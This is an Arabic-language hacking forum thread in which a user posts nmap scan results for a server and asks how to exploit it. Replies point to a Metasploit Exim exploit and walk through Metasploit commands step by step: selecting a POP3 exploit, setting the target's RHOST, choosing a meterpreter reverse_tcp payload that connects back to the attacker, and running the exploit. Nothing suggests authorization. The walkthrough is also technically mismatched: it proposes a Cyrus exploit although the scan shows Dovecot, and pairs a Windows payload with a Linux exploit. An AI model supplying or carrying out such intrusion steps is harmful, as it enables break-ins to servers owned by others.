:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   [مساعده] بعد فحص السيرفر بــnmap كيف الاستغلال (http://www.vbspiders.com/vb/t62061.html)

scaryhacker 04-27-2012 11:41 AM
بعد فحص السيرفر بــnmap كيف الاستغلال
 

السلام عليكم
يا شباب انا فحصة سيرفر وهذي النتيجة هل يوجد ثغرة في برامج السيرفر
ويليت طريقة الاستغلال


================================================== ===============
port ______state___ service_______ version
tcp/21_____open_____ ftp__________ Pure-FTPd
tcp/22 ____open____ ssh______ OpenSSH 4.3 (protocol2.0
tcp/25____ open ____smtp _______Exim smtpd 4.77
tcp/53 ____open ____domain____ dns-nsid:bind.version:9.3.6-P1-RedHat-9.3.6-20.P1.e15
tcp/80 ____open ____http ________nginx 0.9.7
tcp/110____open ___pop3 _______ Dovecot pop3d
tcp/143____open___ imap _____ Dovecot imapd
tcp/443____open____ http?______ http-methods

 ================================================== ===============

الشبح المرح 04-27-2012 12:35 PM
رد: بعد فحص السيرفر بــnmap كيف الاستغلال
 
جرب الثغرة دي http://www.metasploit.com/modules/ex..._string_format
ممكن تنجح مع الاصدار 4.77
و هدا فيديو لشرحها
http://www.youtube.com/watch?v=DnSgO...layer_embedded

MO3ETH 04-27-2012 01:44 PM
رد: بعد فحص السيرفر بــnmap كيف الاستغلال
 
السلام عليكم

إختراق المواقع عنطريق البورت ممكن بمشروع المتاسبلويت الموجود بالباك تراك

بس لازم تعرف طريقة الإستغلال وهل البورت الموفتوح به ثغرة أو لا

بالنسبة للبحث عن الثغرات لها مواقعها مثل

http://www.exploit-db.com/search/

يكفي تحط البورت والثغرات التي تريدها مواقع أجهزة ,,, وهو يعطيك أحدث الثغرات

الأن بالنسبة للفحص اللي عامله لاحظة وجود البورت 110 الخاص بمنفذ pop3 مفتوح ويمكن إستغلاله عنطريق المتا سبلويت

استغلالها كالتالي

بعد فتح المتاسبلويت

ضع الامر search pop3

ورح يظهر لك الاستغلالها المتوفرة

اختر الاستغلال بالامر use متبوعا بالاسم او الرابط هكذا

use linux/pop3/cyrus_pop3d_popsubfolders

ثم show options لأظهار الخيارات المتاحة والمطلوبة من قبل المهاجم

عند تنفيذ الامر انظر ما المطلوب فقط لمطلوب الاي بي المستهدف والبورت

البورت اكتشفناه اثناء الفحص انه مفتوح والاي بي هو الاي بي او الموقع الذي تم فحصه واكتشاف انا المنفذ
110 مفتوح

نكمل الاستغلال بعد تحديد الاي بي المراد اختراقه والذي ظهر لنا اثناء الفحص ونقوم بتحديد بالامر

set RHOST xx.xxx.xxx.xxx

xx.xxx.xxx.xxx:أيبي الموقع

ثم نختار البايلود ويفضل تختار الميتربريتر او اي شيء تريده

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST xxx.xxx.xxx اي بي جهاز المهاجم

set LPORT 4444 بورت مفتوح في جهاز المهاجم

ومن ثم امر الاستغلال exploit

يمكن هذه قديمة يوجد افضل منها فقط انت وبحثك

بالتوفيق

vpn_31 04-27-2012 03:19 PM
رد: بعد فحص السيرفر بــnmap كيف الاستغلال
 
لأخوان ماقصرو معك :)


الساعة الآن 09:46 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0